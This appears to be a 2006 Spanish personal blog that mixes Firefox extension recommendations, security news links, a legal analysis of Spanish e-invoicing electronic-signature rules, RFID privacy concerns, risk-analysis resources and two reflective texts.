LiveBookmarkThis:Ofrece una opción "Añadir marcador vivo" al hacer click-derecho en enlaces.Muy útil con aquellas páginas donde el agregador RSS de firefox no funcione pero si dispongan de un enlace.
https://addons.mozilla.org/firefox/274/

Minimize to Tray:Permite ocultar las ventanas de los productos Mozilla (Firefox/Thunderbird/Seamonkey) en un icono en la bandeja del sistema al minimizarlas.
https://addons.mozilla.org/firefox/2110/

NOSCRIPT:NoScript Extensión ofrece una protección extra para tu navegador Firefox, brindándote la posibilidad de bloquear los scripts y plug-ins que no sean de tu confianza
https://addons.mozilla.org/firefox/722/

Plain Text to Link:Permite abrir direcciones que no vienen representadas como enlaces seleccionándolas y haciendo click con el segundo botón del ratón.
https://addons.mozilla.org/firefox/623/

ScrapBook:funciona a modo de cajón de sastre, guardando en su interior todo tipo de anotaciones, fragmentos copiados de páginas web, direcciones URL e incluso copias de páginas web completas.
https://addons.mozilla.org/firefox/427/

Tabbrowser Extensiones:añade numerosas y prácticas funciones al uso de las tabs
http://piro.sakura.ne.jp/xul/tabextensions/index.html.en#download

VideoDownloader:Esta extensión de Firefox te permite descargar directamente a tu PC los vídeos que puedes visualizar en diversas páginas web, tan populares como Google Video o Youtube.
https://addons.mozilla.org/firefox/2390/

wizz RSS:lector de canales RSS que se integra como una barra de herramientas extra en la interfaz de Firefox y te permite acceder a una larga lista de canales RSS
https://addons.mozilla.org/firefox/424/

Saturday, July 15, 2006

Recortes

Seven keys for complete message security

It isn't enough to protect data at rest, says the chief security officer of a global financial organization.

http://cwflyris.computerworld.com/t/675223/8277815/25990/0/

Is world domination good for security?

CJ Kelly: I was just musing to myself that I am really on a rant about Microsoft's tactics lately. I mentioned to one of my colleagues that I should lighten up because good ol' Bill is one of the world's biggest philanthropists. And my dear friend replied...

To view the rest of the blog post, click the following link.
http://cwflyris.computerworld.com/t/675223/8277815/25792/0/

El 55% de los ataques de phishing proviene de EE.UU.
Fuente: http://laflecha.net/canales/seguridad/200607141/

El 55 por ciento de los ataques de "phishing", técnica consistente en la suplantación de las páginas web de las entidades financieras para captar información confidencial de los usuarios, proceden de los Estados Unidos, según un estudio de la empresa de seguridad informática RSA.

Tuesday, July 04, 2006

Continuidad del Negocio

Código de prácticas para la continuidad del negocio
http://www.bsi-global.com/Risk/BusinessContinuity/BS25999-1DPC.pdf

más:

http://iso9001-iso27001-gestion.blogspot.com/2006/06/bs-25999-gestion-de-la-continuidad-de.html

Ip cómo dato personal.
http://seguinfo.blogspot.com/2006/07/es-la-ip-un-dato-personal.html

Month Of Browser Bug:
http://browserfun.blogspot.com/

Manual de google:
http://zabalnet.diocesanas.org/google/google.pdf

Cursos de verano deusto:
http://www.e-ghost.deusto.es/phpwiki/index.php

Indice de artículos:
http://www.infodmz.com/articulos.htm

Tuesday, June 20, 2006

Factura Electrónica y dispositivo seguro de creación de firma

- Sin consideración especial a la factura electrónica, la Directiva
2001/115/CE dice que los estados no podran obligar a los emisores a firmar
las facturas. Es decir, no es que las facturas en papel no se firman, es que
no se deben firmar. Esto entra en contradicción con la normativa española
que exige firma electrónica reconocida que, como sabemos, es equivalente a
la firma manuscrita.

- En cualquier caso, a pesar de que el RD 1496/2003 impone el uso de firma
electrónica reconocida, la AEAT basa la aceptación de certificados no en el
hecho que sean reconocidos, sino en el hecho que esten "aceptados" por la
Orden HAC/1181/2003.

- En el evento de este año del CEN/ISSS eINVOICING WORKSHOP, se aportaban
algunos argumentos interesantes:

- En aquellos estados en que se requiera firma electrónica reconocida por la
legislación nacional, esta no debe tener la consideración de acuerdo con el
contenido de la factura electrónica. Sólo debe considerarse en este caso el
propósito de garantia de autenticidad e integridad. Para los propositos de
la Directiva el término "firma electrónica" debe tener el significado de
"sello electrónico".

- Dado que no debemos considerar que la firma significa acuerdo con el
contenido, no hay ningún problema en que sean procesos batch los que firmen
las facturas.

"derivaciones":

1. Este tipo de prácticas generan la confusión de que la firma electrónica
reconocida es algo que se puede conseguir con un certificado almacenado en
un simple PC, cuando todos sabemos que la presunción legal exige el
dispositivo seguro (aunque discrepo contigo en que sea necesario que esté
certificado: la certificación simplifica más la prueba, pero no resulta
exigible para la firma reconocida).

2. Aunque en este Estado todos nos autosugestionemos para creer que la firma
electrónica avanzada ha sido transmutada por arte de la AEAT en una firma
electrónica reconocida, resulta que no lo es, y por consiguiente tendremos
más problemas (de los que ya tenemos, quiero decir) para lograr la "libre
circulación de las firmas electrónicas".

3. Además, resulta que con esta práctica no ha liberado a las empresas de la
obligación de cumplir la Ley 59/2003, por lo que el riesgo lo asumen ellas.
Me explico:

a) Una empresa quiere hacer factura telemática; ergo conforme RD 1496/2003
sabe que se encuentra obligada a emplear algo que legalmente sea "firma
electrónica reconocida".

b) Como dispone de un certificado gratuito de la FNMT-RCM, que está admitido
por la AEAT, lo utiliza para facturar.

c) En caso de duda jurídica sobre la firma electrónica producida, lo primero
que encontrará es que ha elegido un instrumento que no era idóneo legalmente
para cumplir la normativa, con lo cual habrá infringido la normativa
tributaria.

d) Por supuesto, la FNMT-RCM no resultará responsable, básicamente por no
haberle prometido en ningún sitio que el producto suministrado era idóneo
para producir firmas electrónicas reconocidas.

e) Por fortuna, como la AEAT ha "admitido" el certificado, entonces
difícilmente será sancionado por la propia AEAT, pero... ¿qué pasa si el
problema legal NO es con la AEAT, sino en relación con un moroso que no
paga?

¿No se puede encontrar con un juez que decida - con base suficiente, por
cierto - que el instrumento no debe producir sus plenos efectos, dado que se
emitió de forma incorrecta? Ciertamente es un vicio subsanable, pero seguro
que podríamos haberlo hecho mejor.

SOBRETODO porque la Directiva 2001/115/CE NO exigía a los Estados Miembro
imponer el requisito de la firma electrónica reconocida, porque - como todo
el mundo sabe - las facturas en papel, NO SE FIRMAN.

CONCLUSIÓN: No parece haber sido una buena idea que el RD 1496/2003 imponga
el uso de la firma electrónica reconocida, para después "saltarse" el
requisito mediante una frase publicada en una página web, que por cierto, no
tiene valor legal.

MI RECOMENDACIÓN: Emplear firma electrónica reconocida "de verdad", CON
INDEPENDENCIA de lo que la AEAT considere dispositivo seguro. 

4. Además, hace falta avanzar en la definición de normas y criterios en
relación con los dispositivos seguros de creación de firma de funcionamiento
automático en servidor (los llamados "servidores de firmas" o "portafirmas",
por algunos), no sea que ahora necesitemos a los pobres humanos para
introducir su PIN de firma constantemente.

De otra forma, podemos hasta conseguir lo contrario de lo perseguido con la
normativa de firma electrónica; es decir, que NO SE USE.



Relacionado con la factura electrónica, me llama la atención una cosa
que no sé si se ha discutido alguna vez con anterioridad. La cuestión es
la siguiente:

- En la orden HAC/1181/2003, disposición segunda, punto 1, 4o párrafo,
se dice que las firmas de las facturas electrónicas deben realizarse con
un "dispositivo seguro de creación de firma" (DSCF) según la legislación
sobre firma electrónica: entiendo que la ley 59/2003, de 19 de
diciembre, de firma electrónica.

- Esta ley define los requisitos de un DSCF en el artículo 24, punto 3.
El artículo 27 viene a decir que es necesario pasar una certificación
para que un dispositivo de creación de firma se considere DSCF y que las
normas técnicas de referencia aparecerán en el diario oficial de la
Unión Europea. Hasta donde yo sé, estos dispositivos deben cumplir la
norma CWA-14169 (Official Journal of European Union, 15.7.2003)
- Hasta la fecha, que yo conozca, sólo algunos dispositivos hardware
criptográficos (alguna tarjeta inteligente), cumple esta norma y desde
luego, ningún módulo criptográfico sólo basada en software lo cumple.

- Sin embargo, en la siguinte dirección, de la AEAT, aparece esta
'innovadora' definición de dispositivo seguro de creación de firma: " La
AEAT aceptará dispositivos seguros de creación de firma consistentes en
aplicaciones informáticas de amplio uso, como módulos criptográficos
normalizados contenidos en sistemas operativos u otro software".

Desde mi punto de vista esto presenta los siguientes problemas:
- Tenemos dos definiciones de DSCP, la que marca la ley y la que le
conviene a la AEAT
- La definición de la AEAT, en aras de facilitar la adopción de la
factura-e, está perjudicando a:
   - fabricantes de tarjetas
   - prestadores de servicios de certificación posicionados en servicio
de alta calidad y seguridad, cumpliendo la legislación vigente

La verdad es que no me parece necesaria esta concesión que está haciendo
la AEAT, pues ya existen en el mercado DSCF, cuyo coste,comparado con el
ahorro que proporciona la e-factura es irrisorio.

Saturday, June 10, 2006

RFID para el rastreo de personas.

http://www.dhs.gov/interweb/assetlibrary/privacy_advcom_rpt_rfid_draft.pdf

En este link la postura del Emerging Applications and
Technology Subcommittee del Department of Homeland Security (USA) en
relación con el uso de tecnologías RFID para el rastreo de personas.

Resulta revelador que se argumente en contra de los pretendidos motivos
aducidos para estos usos de RFID y se reconozca el elevado o excesivo
grado vigilancia que pueden proveer estos sistemas.

Si bien no obstante, lo interesante del documento es la exposición de las
distinas amenazas que pueden afectar a la privacidad de las personas, así
como el listado de best practices aplicables para gestionar los riesgos
que éstas presentan:

- transparencia (método de tratamiento, responsable del tratamiento, datos
personales, finalidad, presencia y localización de lectores),
- utilización sólo para la finalidad consentida y por el tiempo que sea
necesaria,
- marco de opt in-opt out, posibilidad de deshabilitar RFID,
- acceso sólo por lectores autorizados,
- cifrado de la información en soportes, durante la transmisión y en las
bases de datos, e
- imposibilidad de mantener simultáneamente más de una sesión de
identificación.

En relación con este tipo de usos de las tecnologías RFID, y de cara al
nuevo Reglamento LOPD, me asaltan preguntas tales como ¿habrá de incluirse
en el deber de información la tecnología empleada en el tratamiento de los
datos personales? ¿no sería necesario calificar como datos personales de
nivel alto todos aquellos empleados para la identificación unívoca
presencial y electrónica de las personas, dado el posible uso de estos por
terceros con el propósito de suplantar la identidad? ¿la obligación de
cifrado en las comunicaciones no debiera ser también extensible a redes
privadas?...

En algún momento se dijo que el DNI-e podría implementar tecnologías RFID.
Actualmente parece que no es así..
Al margen de que en EEUU los pasaportes ya llevan chip RFID, y que hay una
enmienda para insertar chips baratos en los billetes de más de una cantidad
(deduzco que los de 10$ o más).

Una empresa Israelita sacó al mercado una TINTA especial, que permite imprimir
tags RFID directamente sobre cualquier tipo de papel
http://www.rfidjournal.com/article/articleview/790/1/1

En breve, teniendo en cuenta los últimos movimientos de la Comunidad Europea,
sospecho que empezarán a aparecer propuestas globales para implantar el
seguimiento y rastreo mediante estos chips en prácticamente cualquier situación
(batas escolares, documentos de identidad, piezas de vehículos de lujo, tarjetas
de empleados,...).

Saturday, May 13, 2006

Aprendiendo

Después de un tiempo, uno aprende la sutil diferencia
entre sostener una mano y encadenar un alma;
y uno aprende que el amor no significa acostarse y
que una compañia no significa seguridad,
y uno empieza a aprender....
Que los besos no son contratos y los regalos no son promesas,
y uno empieza a aceptar sus derrotas con la cabeza alta y los ojos abiertos,
y uno aprende a construirtodos sus caminos en el hoy, porque el terreno de mañana es demasiado inseguro para planes....y los futuros tienen una forma de carse en la mitad. Y después de un tiempo uno aprende que si es demasiado, hasta el calor del sol quema. Así que uno planta su propio jardín y decora su propia alma, en vez de esperar a que alguien le traiga flores. Y uno aprende que realmente puede aguantar, que uno realmente es fuerte, que uno realmente vale, y uno aprende y aprende....y con cada día uno aprende.

Thursday, May 11, 2006

Algunos manuales buenos....

http://www.elviajero.org/antoniux/

http://www.esdebian.org/staticpages/index.php?page=20050930063719706

http://www.laespiral.org/recetas/temas.html

http://www.badopi.org/node/861

http://harlok.sytes.net/descargas/servidores8.pdf

http://es.tldp.org/Tutoriales/PERL/tutoperl-html/

http://www.kriptopolis.org/cortafuegos

Análisis de Riesgos

Estoy adaptando a las particularidades de mi organización
un modelo que se está implementando en el área de la
Administración Pública de Argentina, el cual está basado
en la Norma Iso de Seguridad Informática, con adaptaciones.
Cada Organismo, adapta el modelo a sus
requerimientos y necesidades. El modelo adopta el
criterio de "arbol" con ramas que comprenten Políticas
que se desgranan en"Normas" que a su vez generan
Procedimientos.
El tema de "análisis de Riesgos", sobre
los cuales hay metodologías valederas (Cobit, ISO,
sistema Magerit de España, por ejemplo), es el "nudo
central" - desde mi punto de vista - de todo el
trabajo de prevención y mitigación de riesgos.

Para empezar, podés acceder a la página[1]
y bajarte un pdf [2] con el modelo básico de política.

[1].- http://www.sgp.gov.ar/sitio/arcert_politicas.htm
[2].- http://www.arcert.gov.ar/politica/PSI_Modelo-v1_200507.pdf

Wednesday, May 10, 2006

PAZ

En "The white Hole in Time", Peter Russell cuenta la siguiente parábola:

Una mente apegada a sus creencias es como una persona aferrada a un trozo de cuerda. Se sujeta para salvar su preciada vida sabiendo que, si se soltara, caería hacia la muerte. Sus padres, sus profesores y muchos otros se lo han dicho; y cuando mira a su alrededor, ve que todos los demás hacen lo mismo. Nada le convencerá de que se suelte.

Hasta que llega una persona sabia. Ella sabe que sujetarse así no es necesario, que la seguridad que ello ofrece es ilusoria y que sólo sirve para quedarse en el mismo sitio. Por lo tanto, busca un modo de disipar las ilusiones y ayudar a aquel hombre a ser libre. Le habla de la auténtica seguridad, de una alegría más intensa, de la verdadera felicidad, de una mente en paz. Le dice que podrá saborearlo todo... si suelta tan sólo un dedo de la cuerda.

Un dedo -piensa el hombre- no es demasiado riesgo por probar la felicidad. Y así, accede a ser iniciado. Saborea entonces una felicidad y una paz mayores. Pero no lo suficiente para que dure.

Una alegría, una felicidad y una paz aún mayores pueden ser tuyas - le dice el sabio- si sueltas un segundo dedo.

Esto -se dice a sí mismo- resultará más difícil. ¿Podré hacerlo? ¿Será seguro? ¿Tendré valor? Primero duda, luego, flexionando el dedo, prueba lo qué sería soltarse un poco más... y se arriesga. Comprueba así, con alivio, que no se cae. Por el contrario, descubre una felicidad y una paz interior mayores. Pero... ¿Puede ser posible más?

Confía en mí -le dice la persona sabia- ¿Me he equivocado hasta ahora? Conozco tus miedos. Sé que tu mente te dice que es una locura, que va contra todo lo que has aprendido, pero por favor, confía en mí. Mírame, ¿acaso no soy libre? Te prometo que no te pasará nada y que conocerás una felicidad y una satisfacción aún mayores.

¿Deseo tanto la felicidad y la paz interior, que estoy dispuesto a arriesgar todo aquello que me importa? - se pregunta el hombre. En principio sí, pero ¿puedo estar seguro de que estaré a salvo, de que no caeré? Examina sus miedos, analiza sus raíces y explora qué es lo que quiere de verdad, en un intento por convencerse. De pronto, siente que los dedos aflojan la presión, se relajan. Y sabe que puede hacerlo. Saber que debe hacerlo es sólo cuestión de tiempo. Finalmente, se suelta...

En ese momento le invade una sensación mayor de paz. Ahora tan sólo se sujeta con un dedo. La razón le dice que debería haber caído antes, pero no ha sido así. ¿Acaso será malo el hecho de aferrarse? -se pregunta- ¿Habré estado siempre equivocado?

Eso depende de ti -dice la persona sabia- No te puedo ayudar más. Tan sólo recuerda que tus miedos son infundados.

Confiando en su voz interior, el hombre suelta poco a poco el último dedo. Y no ocurre nada. Se queda exactamente donde está. Entonces, comprende por qué. Siempre había tenido los pies en el suelo. Así, mirando al suelo y sabiendo que no tendrá que aferrarse más, su mente encuentra la verdadera paz.